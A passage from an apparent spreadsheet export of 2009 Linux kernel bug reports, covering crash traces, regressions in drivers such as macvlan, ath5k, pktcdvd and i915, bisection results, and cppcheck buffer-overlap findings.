[worker_thread+0x0/0x110] worker_thread+0x0/0x110 May 19 01:40:43 heura8 kernel: [462886.998079] [kthread+0x4b/0x80] kthread+0x4b/0x80 May 19 01:40:43 heura8 kernel: [462886.998137] [child_rip+0xa/0x12] child_rip+0xa/0x12 May 19 01:40:43 heura8 kernel: [462886.998197] [kthread+0x0/0x80] kthread+0x0/0x80 May 19 01:40:43 heura8 kernel: [462886.998253] [child_rip+0x0/0x12] child_rip+0x0/0x12 May 19 01:40:43 heura8 kernel: [462886.998310] May 19 01:40:43 heura8 kernel: [462886.998359] May 19 01:40:43 heura8 kernel: [462886.998359] Code: 0f 0b eb fe 8b 85 b8 00 00 00 0f b7 b7 48 01 00 00 48 c7 c2 May 19 01:40:43 heura8 kernel: [462886.999160] RIP [sunrpc:rpcb_getport_async+0x272/0x3c0] :sunrpc:rpcb_getport_async+0x272/0x3c0 May 19 01:40:43 heura8 kernel: [462886.999263] RSP &lt;ffff810256873e20&gt; May 19 01:40:43 heura8 kernel: [462886.999323] ------------[ cut here ]------------ May 19 01:40:43 heura8 kernel: [462886.999326] ---[ end trace 5d73921843ccffdf ]--- May 19 01:40:43 heura8 kernel: [462886.999436] kernel BUG at /build/buildd/linux-2.6.24/net/sunrpc/rpcb_clnt.c:322! May 19 01:40:43 heura8 kernel: [462886.999512] invalid opcode: 0000 [3] SMP May 19 01:40:43 heura8 kernel: [462886.999634] CPU 1 May 19 01:40:43 heura8 kernel: [462886.999719] Modules linked in: autofs4 ipv6 nfs iptable_filter ip_tables x_tables nfsd lockd nfs_acl auth_rpcgss sunrpc exportfs parport_pc lp parport af_packet psmouse serio_raw evdev iTCO_wdt iTCO_vendor_support button i500</t>
  </si>
  <si>
    <t>[PATCH]Unable to clone tagged VLAN interface for use with macvlan driver</t>
  </si>
  <si>
    <t>2.6.29.3</t>
  </si>
  <si>
    <t>2009-05-20 00:52 UTC</t>
  </si>
  <si>
    <t>sg.tweak</t>
  </si>
  <si>
    <t>2012-06-07 10:57 UTC</t>
  </si>
  <si>
    <t>It is not possible to make clone of tagged VLAN interface to be used as mac-based vlan interfave. How reproducible: Use any 802.1q tagged vlan interface, e.g. eth2.700 and clone it: ip link add link eth2.700 address 00:04:75:cb:38:09 macvlan0 type macvlan ip link set dev macvlan0 up ip addr add 10.195.1.1/24 dev macvlan0 So far, so good. Now try to ping anything via macvlan0: ping 10.195.1.2 Actual results: For every attempted packet tx kernel writes to console: ------------[ cut here ]------------ WARNING: at net/8021q/vlan_dev.c:254 vlan_dev_hard_header+0x36/0x126 [8021q]() Hardware name: M22ES Modules linked in: arptable_filter arp_tables bridge veth macvlan arc4 ecb ppp_mppe ppp_async crc_ccitt ppp_generic slhc autofs4 sunrpc 8021q garp stp ipt_REJECT nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack xt_tcpudp x_tables dm_mirror dm_region_hash dm_log dm_multipath dm_mod sbs sbshc lp floppy snd_intel8x0 joydev snd_seq_dummy snd_intel8x0m snd_ac97_codec ide_cd_mod ac97_bus snd_seq_oss cdrom snd_seq_midi_event serio_raw snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss parport_pc snd_pcm parport battery 8139cp snd_timer i2c_sis96x ac button snd rtc_cmos rtc_core 8139too soundcore rtc_lib mii i2c_core pcspkr snd_page_alloc pata_sis libata sd_mod scsi_mod ext3 jbd ehci_hcd ohci_hcd uhci_hcd [last unloaded: ip_tables] Pid: 0, comm: swapper Tainted: G W 2.6.29.3 #1 Call Trace: [&lt;c0425f48&gt;] warn_slowpath+0x60/0x9f [&lt;c0425f6f&gt;] warn_slowpath+0x87/0x9f [&lt;dffb850d&gt;] vlan_dev_hard_header+0x0/0x126 [8021q] [&lt;dffb8543&gt;] vlan_dev_hard_header+0x36/0x126 [8021q] [&lt;dffb850d&gt;] vlan_dev_hard_header+0x0/0x126 [8021q] [&lt;df83155d&gt;] macvlan_hard_header+0x3c/0x47 [macvlan] [&lt;df831521&gt;] macvlan_hard_header+0x0/0x47 [macvlan] [&lt;c062bf3f&gt;] arp_create+0xef/0x1ff [&lt;c062c08c&gt;] arp_send+0x3d/0x54 [&lt;c062c916&gt;] arp_solicit+0x16c/0x177 [&lt;c05fadd2&gt;] neigh_timer_handler+0x227/0x269 [&lt;c05fabab&gt;] neigh_timer_handler+0x0/0x269 [&lt;c042ce4d&gt;] run_timer_softirq+0xf0/0x141 [&lt;c0429e5a&gt;] __do_softirq+0x76/0xf8 [&lt;c0429de4&gt;] __do_softirq+0x0/0xf8 &lt;IRQ&gt; [&lt;c044fb67&gt;] handle_level_irq+0x0/0xad [&lt;c0429db7&gt;] irq_exit+0x35/0x62 [&lt;c04046bb&gt;] do_IRQ+0xdf/0xf4 [&lt;c04035a7&gt;] common_interrupt+0x27/0x2c [&lt;c04079c5&gt;] default_idle+0x2a/0x3d [&lt;c0401bb6&gt;] cpu_idle+0x57/0x70 ---[ end trace 2def39ad9ce2acf6 ]---</t>
  </si>
  <si>
    <t>Problem with ACPI-Brightness and Hotkeys</t>
  </si>
  <si>
    <t>2009-05-23 09:51 UTC</t>
  </si>
  <si>
    <t>Conrad Kostecki</t>
  </si>
  <si>
    <t>Hello. I've got an Thinkpad X200 Tablet. There seems to be a small problem with the acpi backlight. When I press FN+POS1 (Brightness Up) the brightness is first time going one level down, after second pressing, the brightness is going up again. This happans with FN+END (Brightness Down). After first time, brightness goes up, second time its normal and goes down as it should. Seems to be a bug for me? Which infos do you need? Kernel Version: 2.6.29-gentoo-r4 (problem happens with vanilla sources 2.6.29 too) I am also attaching my dmesg.log</t>
  </si>
  <si>
    <t>Oops in usb-serial with keyspan adapter</t>
  </si>
  <si>
    <t>2009-05-24 20:42 UTC</t>
  </si>
  <si>
    <t>2009-06-01 20:32 UTC</t>
  </si>
  <si>
    <t>Subject : Oops in usb-serial with keyspan adapter on current upstream Submitter : Benjamin Herrenschmidt &lt;benh@kernel.crashing.org&gt; Date : 2009-05-18 0:07 References : http://marc.info/?l=linux-kernel&amp;m=124260532924736&amp;w=4 Handled-By : Alan Stern &lt;stern@rowland.harvard.edu&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>fbcon, intelfb, i915: INFO: possible circular locking dependency detected</t>
  </si>
  <si>
    <t>2.6.30-rc6-git6</t>
  </si>
  <si>
    <t>2009-05-24 21:20 UTC</t>
  </si>
  <si>
    <t>2009-08-20 14:40 UTC</t>
  </si>
  <si>
    <t>Subject : 2.5.30-rc6-git6 -- (fbcon, intelfb, i915?) INFO: possible circular locking dependency detected Submitter : Miles Lane &lt;miles.lane@gmail.com&gt; Date : 2009-05-23 5:08 References : http://marc.info/?l=linux-kernel&amp;m=124305538130702&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Kernel crash with 2.6.29 + nfs + xfs (radix-tree)</t>
  </si>
  <si>
    <t>2009-05-24 21:26 UTC</t>
  </si>
  <si>
    <t>2012-01-25 21:57 UTC</t>
  </si>
  <si>
    <t>Subject : Kernel crash with 2.6.29 + nfs + xfs (radix-tree) Submitter : Alex Samad &lt;alex@samad.com.au&gt; Date : 2009-05-20 0:37 References : http://marc.info/?l=linux-kernel&amp;m=124278675503699&amp;w=4 Notify-Also : Dave Chinner &lt;david@fromorbit.com&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Microphone no longer works on Toshiba Satellite A100</t>
  </si>
  <si>
    <t>2009-05-24 21:37 UTC</t>
  </si>
  <si>
    <t>2009-06-01 20:36 UTC</t>
  </si>
  <si>
    <t>Subject : [Bisected regression] Microphone no longer works on Toshiba Satellite A100 Submitter : "M. Vefa Bicakci" &lt;bicave@superonline.com&gt; Date : 2009-05-24 15:49 References : http://marc.info/?l=linux-kernel&amp;m=124318383910011&amp;w=4 Caused by: commit 23f0c048ba59ad5c2f3fd85ed98360b631dbf6f8 Author: Takashi Iwai &lt;tiwai@suse.de&gt; Date: Thu Feb 26 13:03:58 2009 +0100 ALSA: hda - Clean up the input pin setup in automatic mode First-Bad-Commit : 23f0c048ba59ad5c2f3fd85ed98360b631dbf6f8 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel/async.c broke pata_legacy.c</t>
  </si>
  <si>
    <t>2.6.30-rc7</t>
  </si>
  <si>
    <t>2009-05-24 21:40 UTC</t>
  </si>
  <si>
    <t>2009-06-06 22:32 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.30-rc7 regression] kernel/async.c broke pata_legacy.c Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2009-05-24 16:13 References : http://marc.info/?l=linux-kernel&amp;m=124318186507210&amp;w=4 Handled-By : James Bottomley &lt;James.Bottomley@hansenpartnership.com&gt; Patch : http://patchwork.kernel.org/patch/25699/ This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ath5k trace and panic</t>
  </si>
  <si>
    <t>2.6.29.4 + compat-wireless-2009-05-22</t>
  </si>
  <si>
    <t>2009-05-25 12:37 UTC</t>
  </si>
  <si>
    <t>Henk</t>
  </si>
  <si>
    <t>2009-07-28 14:55 UTC</t>
  </si>
  <si>
    <t>- At hostapd shutdown the kernel panics frequently, freezing up the system. (nothing in the logs I will have to create an screenshot.) - At startup I encounter the trace below. - In between the WPA2 sessions seem to work flawlessly. [ 37.939157] ---------</t>
  </si>
  <si>
    <t>linksys wusb54gc-eu v2 is not detected by rtl8187 driver</t>
  </si>
  <si>
    <t>2009-05-25 17:09 UTC</t>
  </si>
  <si>
    <t>Przemyslaw Kulczycki</t>
  </si>
  <si>
    <t>2009-09-02 15:04 UTC</t>
  </si>
  <si>
    <t>Linksys WUSB54GC-EU v2 USB wifi dongle has USB ID 1737:0073 and is not detected by Linux 2.6.28 (Ubuntu 9.04). The Windows driver shows that it has the RTL8187B chipset so the rtl8187 module should support it.</t>
  </si>
  <si>
    <t>Warning 'Invalid throttling state, reset' gets displayed when it should not be</t>
  </si>
  <si>
    <t>2009-05-26 15:24 UTC</t>
  </si>
  <si>
    <t>2009-08-27 15:02 UTC</t>
  </si>
  <si>
    <t>Created attachment 21559 [details] Dubug patch and debug output As suggested by Rafael Wysocki I'm filing a new bug to track the possible regression introduced in 2.6.30-rc6 with commit 4973b22a: 'ACPI processor: reset the throttling state once it's invalid'. The prior discussion about this can be found starting at comment #23 of http://bugzilla.kernel.org/show_bug.cgi?id=13259, the BR that resulted in the patch to be added. I've added the same people in CC. Attached a debug patch and the resulting output. This shows a few things. 1) The value of pr-&gt;throttling.state after boot is 100% correct for my system and proc is able to show correct state because of that. 2) The "invalid state" returned by acpi_throttling_rdmsr() is 2, which indeed does not match any of the values of tx-&gt;control. However, it also does not seem like a completely random value. 3) The reset that is being done when the warning triggers is bogus for my case because in acpi_processor_set_throttling_ptc() it is ignored due to the following test: if (state == pr-&gt;throttling.state) return 0; 4) After the status _is_ set by really changing the state, the value returned by acpi_throttling_rdmsr() does start to match tx-&gt;control. Questions: - Does the ACPI spec actually demand that the value read through acpi_throttling_rdmsr() should be "correct" after system boot? - Given that in my case all other data is consistent, is it really the right thing to do to test that value against tx-&gt;control at that point? Conclusions: - Even if the value returned from acpi_throttling_rdmsr() is wrong, the inconsistency seems minor enough that the kernel should just ignore it. - My case is fundamentally different from the original BR: while for the broken case the reset _does_ fix a problem, for my system the reset is bogus (even structurally broken?) because it does not get recognized as a status change and thus is skipped. If additional debugging info is needed, please feel free to ask. Cheers, FJP</t>
  </si>
  <si>
    <t>check_early_ioremap_leak warning</t>
  </si>
  <si>
    <t>2009-05-27 18:19 UTC</t>
  </si>
  <si>
    <t>Christopher Dale</t>
  </si>
  <si>
    <t>2009-08-29 19:02 UTC</t>
  </si>
  <si>
    <t>Created attachment 21588 [details] dmesg containing the warning for some context ------------[ cut here ]------------ WARNING: at arch/x86/mm/ioremap.c:603 check_early_ioremap_leak+0x48/0x5e() Hardware name: Debug warning: early ioremap leak of 1 areas detected. Modules linked in: Pid: 1, comm: swapper Not tainted 2.6.30-rc6-next-20090521 #3 Call Trace: [&lt;c0120648&gt;] warn_slowpath_common+0x60/0x90 [&lt;c01206ac&gt;] warn_slowpath_fmt+0x24/0x27 [&lt;c05d6703&gt;] check_early_ioremap_leak+0x48/0x5e [&lt;c0101137&gt;] do_one_initcall+0x4a/0x10c [&lt;c05d66bb&gt;] ? check_early_ioremap_leak+0x0/0x5e [&lt;c01427d5&gt;] ? register_irq_proc+0x7f/0x9b [&lt;c0142844&gt;] ? init_irq_proc+0x53/0x60 [&lt;c05ca296&gt;] kernel_init+0x102/0x153 [&lt;c05ca194&gt;] ? kernel_init+0x0/0x153 [&lt;c01033df&gt;] kernel_thread_helper+0x7/0x10 ---[ end trace 697c170438591ef6 ]--- please boot with early_ioremap_debug and report the dmesg. Anyone know where I'm supposed to put the "early_ioremap_debug"? If you need more info, lemme know. Thanks everyone :) Christopher</t>
  </si>
  <si>
    <t>kernel crash SONY DVD-ROM with cd</t>
  </si>
  <si>
    <t>2009-05-28 16:54 UTC</t>
  </si>
  <si>
    <t>2011-02-06 15:46 UTC</t>
  </si>
  <si>
    <t>13619 13696</t>
  </si>
  <si>
    <t>Created attachment 21602 [details] dump of crash at boottime After placing a cd in the dvdplayer the kernel crashes. Both at boot as at runtime.</t>
  </si>
  <si>
    <t>pktcdvd writing is really slow with CFQ scheduler (bisected)</t>
  </si>
  <si>
    <t>2009-05-28 18:43 UTC</t>
  </si>
  <si>
    <t>2010-11-30 09:32 UTC</t>
  </si>
  <si>
    <t>Created attachment 21608 [details] Full dmesg I'm writing some files (about 200MB) on a DVD-RW with the pktcdvd driver. The writing starts with good rate and then it drops down to 16 kB/s, and it can not go back to better rates until the write operation has finished and the system has synced. Switching /dev/sr0 to anticipatory scheduler does restore normal rates (up to 2700 kB/s). How to reproduce : - format a DVD-RW for packet-writing - # pktsetup 0 /dev/sr0 - # mount -o noatime,nodiratime,rw /dev/pktcdvd/pktcdvd0 /media/pkt - # dd if=/dev/zero of=/media/pkt/flexbackup/test bs=1024K count=8 conv=fdatasync I bisected this behaviour to the following commit: 2f5cb7381b737e24c8046fd4aeab571fb71315f5 is first bad commit commit 2f5cb7381b737e24c8046fd4aeab571fb71315f5 Author: Jens Axboe &lt;jens.axboe@oracle.com&gt; Date: Tue Apr 7 08:51:19 2009 +0200 cfq-iosched: change dispatch logic to deal with single requests at the time The IO scheduler core calls into the IO scheduler dispatch_request hook to move requests from the IO scheduler and into the driver dispatch list. It only does so when the dispatch list is empty. CFQ moves several requests to the dispatch list, which can cause higher latencies if we suddenly have to switch to some important sync IO. Change the logic to move one request at the time instead. This should almost be functionally equivalent to what we did before, except that we now honor 'quantum' as the maximum queue depth at the device side from any single cfqq. If there's just a single active cfqq, we allow up to 4 times the normal quantum. Signed-off-by: Jens Axboe &lt;jens.axboe@oracle.com&gt; :040000 040000 be8b0f16d8faba88fc04e877eaa9240ec5d00648 5fd6eb925f065f411ed0d387277e45ba722ea154 M block I was unable to revert because of too many conflicts. (please note: the kernel is actually vanilla kernel with reiser4 patches)</t>
  </si>
  <si>
    <t>adb trackpad disappears after suspend to ram</t>
  </si>
  <si>
    <t>2009-05-30 22:03 UTC</t>
  </si>
  <si>
    <t>2009-10-26 18:59 UTC</t>
  </si>
  <si>
    <t>Subject : [regression] adb trackpad disappears after suspend to ram Submitter : Jan Scholz &lt;scholz@fias.uni-frankfurt.de&gt; Date : 2009-05-28 7:59 References : http://marc.info/?l=linux-kernel&amp;m=124349762314976&amp;w=4 Handled-By : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Notify-Also : Benjamin Herrenschmidt &lt;benh@kernel.crashing.org&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Performance regression in 2.6.30-rc7</t>
  </si>
  <si>
    <t>2009-05-30 22:09 UTC</t>
  </si>
  <si>
    <t>2010-11-30 10:22 UTC</t>
  </si>
  <si>
    <t>Subject : Performance regressions in 2.6.30-rc7? Submitter : Diego Calleja &lt;diegocg@gmail.com&gt; Date : 2009-05-30 18:51 References : http://lkml.org/lkml/2009/5/30/146 Notify-Also : Andrew Morton &lt;akpm@linux-foundation.org&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Barscanner (USB HID Keyboard) stopped functioning in kernels &gt;= 2.6.28</t>
  </si>
  <si>
    <t>&gt;= 2.6.28</t>
  </si>
  <si>
    <t>2009-05-31 12:21 UTC</t>
  </si>
  <si>
    <t>Guido</t>
  </si>
  <si>
    <t>2010-10-07 17:35 UTC</t>
  </si>
  <si>
    <t>Created attachment 21656 [details] Additional information (lsusb, lspci, ioports, iomem, kernel configs) My König CMP-BARSCAN 10 (being reported as ID 1130:0001 Tenx Technology, Inc.) stopped working in kernels upwards from 2.6.28. I'm running a Gentoo 64-bits system. The device is still being detected, however, no input-node is being created. Dmesg reports (under a 2.6.28 kernel): usb 6-2: new low speed USB device using uhci_hcd and address 2 usb 6-2: configuration #1 chosen from 1 choice usb 6-2: New USB device found, idVendor=1130, idProduct=0001 usb 6-2: New USB device strings: Mfr=0, Product=2, SerialNumber=0 usb 62: Product: USB-TMU Under 2.6.27.24 it does work as expected. Dmesg reports: usb 6-2: new low speed USB device using uhci_hcd and address 2 usb 6-2: configuration #1 chosen from 1 choice input: USB-TMU as /class/input/input6 input: USB HID v1.10 Keyboard [USB-TMU] on usb-0000:00:1d.0-2 usb 6-2: New USB device found, idVendor=1130, idProduct=0001 usb 6-2: New USB device strings: Mfr=0, Product=2, SerialNumber=0 usb 6-2: Product: USB-TMU Trying several kernels, I can conclude the following: 2.6.25-Gentoo-r9 --&gt; Works 2.6.27-Gentoo-r8 --&gt; Works 2.6.28-Gentoo-r5 --&gt; Broken 2.6.27.10 (Vanilla) --&gt; Works 2.6.27.24 (Vanilla) --&gt; Works 2.6.28 (Vanilla) --&gt; Broken 2.6.28.9 (Vanilla) --&gt; Broken 2.6.29.4 (Vanilla) --&gt; Broken 2.6.30 RC7 (Vanilla) --&gt; Broken Additional information is attached in the attached text file, containing: * lsusb -vv output * Kernel 2.6.27 configuration * Kernel 2.6.29 configuration * /proc/ioports * /proc/iomem * lspci -vvv</t>
  </si>
  <si>
    <t>Sometimes (very rarely) one of CPU cores disappears after suspend/resume</t>
  </si>
  <si>
    <t>2009-06-01 12:26 UTC</t>
  </si>
  <si>
    <t>2011-01-16 21:57 UTC</t>
  </si>
  <si>
    <t>The bug was originally filed as https://bugzilla.novell.com/show_bug.cgi?id=501368 Please refer to this page for more information.</t>
  </si>
  <si>
    <t>possible deadlock when doing governor switching</t>
  </si>
  <si>
    <t>2009-06-01 15:46 UTC</t>
  </si>
  <si>
    <t>2009-07-27 21:35 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG]cpufreq_ondemand: a recent regression Submitter : Shaohua Li &lt;shaohua.li@intel.com&gt; Date : 2009-05-31 16:36 References : http://www.spinics.net/lists/cpufreq/msg00711.html Handled-By : Mathieu Desnoyers &lt;mathieu.desnoyers@polymtl.ca&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>found overlapping data buffer</t>
  </si>
  <si>
    <t>2009-06-03 14:16 UTC</t>
  </si>
  <si>
    <t>2009-06-18 09:06 UTC</t>
  </si>
  <si>
    <t>Hello, i detected an overlapping data buffer at file "linux-2.6.29.3/drivers/scsi/gdth_proc.c" For detection, i used the static code analysis tool cppcheck. It prints the following message: [linux-2.6.29.3/drivers/scsi/gdth_proc.c:199]: (error) Overlapping data buffer hrec Take a loop at file gdth_proc.c at line 199: sprintf(hrec,"%s,%d", hrec, reserve_list[i]); Here, hrec is used by iteself at the sprintf statement, this is dangerous!!!! Best regards Ettl Martin</t>
  </si>
  <si>
    <t>2009-06-03 14:20 UTC</t>
  </si>
  <si>
    <t>2009-06-18 08:57 UTC</t>
  </si>
  <si>
    <t>Hello, i detected an overlapping data buffer at file "[linux-2.6.29.3/drivers/scsi/qla2xxx/qla_attr.c" For detection, i used the static code analysis tool cppcheck. It prints the following message: [linux-2.6.29.3/drivers/scsi/qla2xxx/qla_attr.c:545]: (error) Overlapping data buffer buf Take a loop at file qla_attr.c at line 545: return snprintf(buf, PAGE_SIZE, "%s\n", buf); Here, buf is used by iteself, this is dangerous!!!! Best regards Ettl Martin</t>
  </si>
  <si>
    <t>Battery disappears after suspend/resume on HP laptop.</t>
  </si>
  <si>
    <t>x86-64 Linux</t>
  </si>
  <si>
    <t>2.6.30.8</t>
  </si>
  <si>
    <t>2009-06-04 01:51 UTC</t>
  </si>
  <si>
    <t>Gustavo Vieira</t>
  </si>
  <si>
    <t>2009-11-23 16:41 UTC</t>
  </si>
  <si>
    <t>Created attachment 21740 [details] dmesg after suspend/resume My HP Pavilion dv4-1125br suspends and resumes correctly. However, the battery information provided by ACPI disappears. Before suspend I can get battery information in /proc/acpi/battery/BAT0/state. After the suspend/resume, BAT0/state shows not present. This is a fairly recent laptop, and this problem is present in Fedora kernels as early as 2.6.27. I've found bug reports of this issue for Ubunto and Arch Linux, so I don't believe it is Fedora specific.</t>
  </si>
  <si>
    <t>general protection fault - sony VGN-Z540 laptop</t>
  </si>
  <si>
    <t>2.6.30-rc8-wl</t>
  </si>
  <si>
    <t>2009-06-04 18:11 UTC</t>
  </si>
  <si>
    <t>I am running kernel 2.6.30-rc8-wl which is the wireless-testing kernel (Linus's kernel + latest wireless bits). On my system (a Sony VGN-Z540) I see a gpf when I enable rfkill. Even though the gpf appears, rfkill works fine (wireless stops working). The gpf only appeared once when I enabled rfkill, after that when I disabled/enabled rfkill a few times I did not see it again. Here it is: [ 709.366404] general protection fault: 0000 [#1] SMP [ 709.366551] last sysfs file: /sys/class/rfkill/rfkill5/state [ 709.366616] CPU 1 [ 709.366707] Modules linked in: iwlagn iwlcore led_class mac80211 cfg80211 i915 drm i2c_algo_bit i2c_core ppdev ipv6 acpi_cpufreq cpufreq_userspace cpufreq_powersave cpufreq_ondemand cpufreq_conservative cpufreq_stats freq_table container sbs sbshc lp parport arc4 ecb pcmcia joydev yenta_socket rsrc_nonstatic af_packet tpm_infineon sony_laptop psmouse iTCO_wdt iTCO_vendor_support pcmcia_core intel_agp video output tpm tpm_bios rfkill pcspkr serio_raw processor battery button ac evdev ext3 jbd mbcache sg sr_mod sd_mod cdrom ahci libata scsi_mod ehci_hcd uhci_hcd usbcore thermal fan thermal_sys fuse [last unloaded: cfg80211] [ 709.369182] Pid: 66, comm: kacpi_notify Not tainted 2.6.30-rc8-wl #40 VGN-Z540N [ 709.369182] RIP: 0010:[&lt;ffffffffa0200dda&gt;] [&lt;ffffffffa0200dda&gt;] sony_nc_rfkill_set+0xa/0x40 [sony_laptop] [ 709.369182] RSP: 0018:ffff8800bb663dc0 EFLAGS: 00010286 [ 709.369182] RAX: 0000000000000001 RBX: 0000000000000000 RCX: 0000000000000001 [ 709.369182] RDX: 0000000000000001 RSI: 0000000000000001 RDI: ffff880036f74480 [ 709.369182] RBP: ffff8800bb663dd0 R08: 0000000000000000 R09: 0000000000000000 [ 709.369182] R10: 0000000000000001 R11: 0000000000000001 R12: 0000000000000000 [ 709.369182] R13: 0000000000000000 R14: 0000000000000000 R15: ffff8800bb663df0 [ 709.369182] FS: 0000000000000000(0000) GS:ffff88000105e000(0000) knlGS:0000000000000000 [ 709.369182] CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b [ 709.369182] CR2: 00007ffff2051000 CR3: 00000000ba6b6000 CR4: 00000000000006e0 [ 709.369182] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 709.369182] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 709.369182] Process kacpi_notify (pid: 66, threadinfo ffff8800bb662000, task ffff8800bb658f40) [ 709.369182] Stack: [ 709.369182] 0000000000000000 0000000000000000 ffff8800bb663e20 ffffffffa0203292 [ 709.369182] ffff8800bb659548 0000000000000246 0000000000000202 ffff8800b729e2f8 [ 709.369182] ffff8800b5371898 ffff8800bb658f40 ffff880001058ec0 ffffffff803b5596 [ 709.369182] Call Trace: [ 709.369182] [&lt;ffffffffa0203292&gt;] sony_nc_notify+0x222/0x260 [sony_laptop] [ 709.369182] [&lt;ffffffff803b5596&gt;] ? acpi_os_execute_deferred+0x0/0x39 [ 709.369182] [&lt;ffffffff803b8192&gt;] acpi_device_notify+0x14/0x16 [ 709.369182] [&lt;ffffffff803c5690&gt;] acpi_ev_notify_dispatch+0x5f/0x6b [ 709.369182] [&lt;ffffffff803b55c2&gt;] acpi_os_execute_deferred+0x2c/0x39 [ 709.369182] [&lt;ffffffff8024d720&gt;] worker_thread+0x1f0/0x340 [ 709.369182] [&lt;ffffffff8024d6cd&gt;] ? worker_thread+0x19d/0x340 [ 709.369182] [&lt;ffffffff802525a0&gt;] ? autoremove_wake_function+0x0/0x40 [ 709.369182] [&lt;ffffffff80263a8d&gt;] ? trace_hardirqs_on+0xd/0x10 [ 709.369182] [&lt;ffffffff8024d530&gt;] ? worker_thread+0x0/0x340 [ 709.369182] [&lt;ffffffff8024d530&gt;] ? worker_thread+0x0/0x340 [ 709.369182] [&lt;ffffffff80252156&gt;] kthread+0x56/0x90 [ 709.369182] [&lt;ffffffff8020ce7a&gt;] child_rip+0xa/0x20 [ 709.369182] [&lt;ffffffff8020c87c&gt;] ? restore_args+0x0/0x30 [ 709.369182] [&lt;ffffffff80252100&gt;] ? kthread+0x0/0x90 [ 709.369182] [&lt;ffffffff8020ce70&gt;] ? child_rip+0x0/0x20 [ 709.369182] Code: e1 89 c2 48 c7 c6 36 4e 20 a0 e8 b2 fe ff ff 89 c2 89 d0 48 8b 1c 24 4c 8b 64 24 08 c9 c3 0f 1f 00 55 89 f2 48 89 e5 48 83 ec 10 &lt;8b&gt; 34 bd 80 3e 20 a0 bf 24 01 00 00 81 c6 00 01 00 00 89 f0 0d [ 709.369182] RIP [&lt;ffffffffa0200dda&gt;] sony_nc_rfkill_set+0xa/0x40 [sony_laptop] [ 709.369182] RSP &lt;ffff8800bb663dc0&gt; [ 709.375883] ---[ end trace 6c116875da7d6347 ]---</t>
  </si>
  <si>
    <t>Unused bands in intefb console and smaller 180x56 -&gt; 128x48</t>
  </si>
  <si>
    <t>v2.6.30-rc8-5-gc9fb15f</t>
  </si>
  <si>
    <t>2009-06-05 16:30 UTC</t>
  </si>
  <si>
    <t>Santi</t>
  </si>
  <si>
    <t>2009-06-28 19:14 UTC</t>
  </si>
  <si>
    <t>Created attachment 21768 [details] Xorg.0.log, just in case there is useful info Hello, I've tested the code in latest linux-2.6.git (v2.6.30-rc8-13-gb87297f) and I've found a regression. Now I have unused screen in the bottom and the right of the screen, additionally the size of the console also change, 180x56 -&gt; 128x48. -Console: switching to colour frame buffer device 180x56 +Console: switching to colour frame buffer device 128x48 I've bisected it down to: commit c9fb15f60eb517c958dec64dca9357bf62bf2201 Author: Keith Packard &lt;keithp@keithp.com&gt; Date: Sun May 31 05:42:28 2009 drm: Hook up DPMS property handling in drm_crtc.c. Add drm_helper_connector_dpms. Making the drm_crtc.c code recognize the DPMS property and invoke the connector-&gt;dpms function doesn't remove any capability from the driver while reducing code duplication. That just highlighted the problem with the existing DPMS functions which could turn off the connector, but failed to turn off any relevant crtcs. The new drm_helper_connector_dpms function manages all of that, using the drm_helper-specific crtc and encoder dpms functions, automatically computing the appropriate DPMS level for each object in the system. This fixes the current troubles in the i915 driver which left PLLs, pipes and planes running while in DPMS_OFF mode or even while they were unused. Signed-off-by: Keith Packard &lt;keithp@keithp.com&gt; Signed-off-by: Dave Airlie &lt;airlied@redhat.com&gt; Also reverting this commit also fixes the issue. My machine is a Dell Latitude E5400, with an intel card: 00:02.1 Display controller: Intel Corporation Mobile 4 Series Chipset Integrated Graphics Controller (rev 07) with an LVDS. Some DRM info from dmesg: DRM Information from dmesg: [ 0.579953] [drm] Initialized drm 1.1.0 20060810 [ 0.586016] [drm] MTRR allocation failed. Graphics performance may suffer. [ 1.423615] [drm] TV-18: set mode NTSC 480i 0 [ 1.610925] [drm] LVDS-8: set mode 1440x900 1a [ 1.991910] fb0: inteldrmfb frame buffer device [ 2.017771] [drm] Initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 18.757526] [drm] TV-18: set mode NTSC 480i 0 [ 18.898089] [drm] TV-18: set mode NTSC 480i 0 [ 19.338302] [drm] TV-18: set mode NTSC 480i 0 [ 19.478601] [drm] TV-18: set mode NTSC 480i 0 [ 32.086362] [drm] TV-18: set mode NTSC 480i 0 [ 32.226401] [drm] TV-18: set mode NTSC 480i 0 [ 32.654244] [drm] TV-18: set mode NTSC 480i 0 [ 32.795055] [drm] TV-18: set mode NTSC 480i 0 [ 33.230331] [drm] TV-18: set mode NTSC 480i 0 [ 33.370942] [drm] TV-18: set mode NTSC 480i 0 Thanks, Santi</t>
  </si>
  <si>
    <t>Cannot set larger mtu on vlan then on underlying untagged device</t>
  </si>
  <si>
    <t>2.6.27.24-170.2.68.fc10.i686</t>
  </si>
  <si>
    <t>2009-06-06 17:43 UTC</t>
  </si>
  <si>
    <t>2012-06-08 11:38 UTC</t>
  </si>
  <si>
